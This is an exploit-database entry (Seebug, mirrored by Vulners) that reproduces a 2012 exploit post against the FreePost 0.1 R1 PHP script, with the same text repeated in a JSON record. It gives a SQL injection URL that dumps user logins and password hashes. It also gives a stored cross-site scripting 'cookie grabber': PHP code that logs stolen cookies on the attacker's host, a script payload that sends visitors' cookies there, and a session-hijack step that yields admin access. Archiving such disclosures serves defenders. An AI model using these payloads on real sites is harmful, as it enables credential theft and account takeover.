Search...

freepost 0.1 r1 - Multiple Vulnerabilities

2014-07-01T00:00:00

ID SSV:73008
Type seebug
Reporter Root
Modified 2014-07-01T00:00:00

Description

No description provided by source.

                                        
                                            
                                                #####################################################################################################
# Exploit FreePost 0.1 R1 SQL Injection
# Date: June 6nd 2012
# Author: ThE g0bL!N
# Version: 0.1 R1
# Vendor Url: http://www.phpbrasil.com/script/dYRoLbwWu_zR/freepost-01-r1
# Tested on: Xp Service Pack 2
#####################################################################################################
#  Greets To : Lider Pirata  , Yassine Tablouche , Ilyes , Bilal ,
Habib,  Djamal  , Boukhors .. etc
#####################################################################################################

Exploit:
--------
 1) You Need To register
 2) http://localhost/freepost0.1-R1/edit.php?action=edit&post=1 [SQL CODE]
 3) /edit.php?action=edit&post=-1+union+select+1,2,3,concat(user_login,0x3a,user_pass),5,6,7+from+b2users--


#################################################################################################################
[+] FreePost 0.1 R1 Cookie Grabber Exploit
[+] Discovered By ThE g0bL!N
[+] Greets To : Lider Pirata , Yassine Tablouche , Ilyes , Bilal ,
Habib, Djamal , Boukhors .. etc
[+] Vendor:http://www.phpbrasil.com/script/dYRoLbwWu_zR/freepost-01-r1
#################################################################################################################
PoC
--
[+] Make 2 files and upload to your host :
[+]cookie.php - &#62; Put in this File That Code:
&#60;?php
$cookie = $_GET[&#39;cookie&#39;];
$log = fopen(&#34;log.txt&#34;, &#34;a&#34;);
fwrite($log, $cookie .&#34;\n&#34;);
fclose($log);
?&#62;
[+]log.txt - &#62; CHMOD it 777 and put in the same directory with cookie.php

[+]Exploit:
-------
1)First Register in the site
2) go to http://site.com/edit.php
3) add This Code :&#60;script&#62;document.location
=&#34;http://localhost/[path]/cookie.php?cookie=&#34; +
document.cookie;&#60;/script&#62;
4) any one open this page engenie.php you gonna still his cookies

Example
-------
Result:
------
PHPSESSID:aafaa0f2cad7431d5cec1431e5bafb03
Then we put that code
javascript:document.cookie=&#34;PHPSESSID=aafaa0f2cad7431d5cec1431e5bafb03;path=/&#34;;
After That you see :
Hello Admin :)
################################################################################################################

JSON Vulners Source

Initial Source

{"href": "https://www.seebug.org/vuldb/ssvid-73008", "status": "poc", "bulletinFamily": "exploit", "modified": "2014-07-01T00:00:00", "title": "freepost 0.1 r1 - Multiple Vulnerabilities", "cvss": {"vector": "NONE", "score": 0.0}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-73008", "cvelist": [], "description": "No description provided by source.", "viewCount": 1, "published": "2014-07-01T00:00:00", "sourceData": "\n #####################################################################################################\r\n# Exploit FreePost 0.1 R1 SQL Injection\r\n# Date: June 6nd 2012\r\n# Author: ThE g0bL!N\r\n# Version: 0.1 R1\r\n# Vendor Url: http://www.phpbrasil.com/script/dYRoLbwWu_zR/freepost-01-r1\r\n# Tested on: Xp Service Pack 2\r\n#####################################################################################################\r\n# Greets To : Lider Pirata , Yassine Tablouche , Ilyes , Bilal ,\r\nHabib, Djamal , Boukhors .. etc\r\n#####################################################################################################\r\n\r\nExploit:\r\n--------\r\n 1) You Need To register\r\n 2) http://localhost/freepost0.1-R1/edit.php?action=edit&post=1 [SQL CODE]\r\n 3) /edit.php?action=edit&post=-1+union+select+1,2,3,concat(user_login,0x3a,user_pass),5,6,7+from+b2users--\r\n\r\n\r\n#################################################################################################################\r\n[+] FreePost 0.1 R1 Cookie Grabber Exploit\r\n[+] Discovered By ThE g0bL!N\r\n[+] Greets To : Lider Pirata , Yassine Tablouche , Ilyes , Bilal ,\r\nHabib, Djamal , Boukhors .. etc\r\n[+] Vendor:http://www.phpbrasil.com/script/dYRoLbwWu_zR/freepost-01-r1\r\n#################################################################################################################\r\nPoC\r\n--\r\n[+] Make 2 files and upload to your host :\r\n[+]cookie.php - > Put in this File That Code:\r\n<?php\r\n$cookie = $_GET['cookie'];\r\n$log = fopen("log.txt", "a");\r\nfwrite($log, $cookie ."\\n");\r\nfclose($log);\r\n?>\r\n[+]log.txt - > CHMOD it 777 and put in the same directory with cookie.php\r\n\r\n[+]Exploit:\r\n-------\r\n1)First Register in the site\r\n2) go to http://site.com/edit.php\r\n3) add This Code :<script>document.location\r\n="http://localhost/[path]/cookie.php?cookie=" +\r\ndocument.cookie;</script>\r\n4) any one open this page engenie.php you gonna still his cookies\r\n\r\nExample\r\n-------\r\nResult:\r\n------\r\nPHPSESSID:aafaa0f2cad7431d5cec1431e5bafb03\r\nThen we put that code\r\njavascript:document.cookie="PHPSESSID=aafaa0f2cad7431d5cec1431e5bafb03;path=/";\r\nAfter That you see :\r\nHello Admin :)\r\n################################################################################################################\n ", "id": "SSV:73008", "enchantments_done": [], "type": "seebug", "lastseen": "2017-11-19T14:04:52", "reporter": "Root", "enchantments": {"score": {"value": -0.3, "vector": "NONE", "modified": "2017-11-19T14:04:52", "rev": 2}, "dependencies": {"references": [], "modified": "2017-11-19T14:04:52", "rev": 2}, "vulnersScore": -0.3}, "references": []}